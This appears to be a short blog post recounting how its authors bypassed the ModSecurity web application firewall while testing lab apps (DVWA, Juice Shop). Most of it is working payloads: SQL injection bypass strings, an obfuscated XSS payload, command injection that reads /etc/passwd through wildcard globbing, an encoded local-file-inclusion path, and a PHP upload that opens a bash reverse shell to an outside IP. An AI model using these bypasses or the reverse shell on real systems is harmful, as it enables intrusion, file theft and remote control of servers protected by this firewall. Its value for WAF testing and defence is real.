How we defeated libModSecurity aka ModSecurity

1-SQL Injection

Bypassing a WAF depends usually on the front/back architecture, we were able to successfully perform SQLis by using some underrated (at least when talking about injections) MYSQL functions.
It’s worth saying that before trying to bypass a WAF, it’s quite important to get as much informed as possible about all the technological bricks used by the application being assessed.

1'+or++1+ — +
11'+or++WEIGHT_STRING(@@version)=WEIGHT_STRING(@@version)+ — +
admin’or 1=1; —
admin’;

2-XSS

We fuzzed as much as we could, no working payload popped up for DVWA, but interestingly, Juice which uses sanitize-html helped us a bit by kind of mutating our payload.

“</eeeee><<d<<<<<</eee>a href=<X sAAAAkkkk>jav&#x09;asc&#x09;ript&#x09&#x09&#x0A;&#x3a;alert(0912);>xssmeplease”

3-Command Injection

Without a surprise we tested the default injection method which failed:

; ls -al
fuzzing ;%xx
;) ls -al

Bypassing /etc/passwd filter

Well, injecting a command is cool, but if the WAF blocks our attempts to read files, it could become less funny. Based on what we found, we tried to read the content of /etc/passwd with the following: ;)cat /etc/passwd the attempt was unsuccessful, but by combining our bypass with an old trick:

;)cat /e?c/p?sswd

4-Local file inclusion

LFI was quite easy, the WAF doesn’t seem to really care about many files, with the paranoia level 2 enabled, you can include almost everything:

%2fproc%2fstat

5-Unrestricted File Upload

Flaws in FU restriction are always fun because they end up in poping easy shells. Modsec was( thankfully) able to block a very basic payload:

examples.php containing <?php exec(“/bin/bash -c ‘bash -i>& /dev/tcp/”192.168.136.133"/4444 0>&1’”);?>
We popped a shell

Conclusion

This research was not very serious, and we found every single bypass in less than 20 hours of work, Except if you are willing to push paranoia to its 4th level and have time and energy to deal with a very high number of false positives, we clearly do not advice the use of Modsec to protect any critical stuff.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store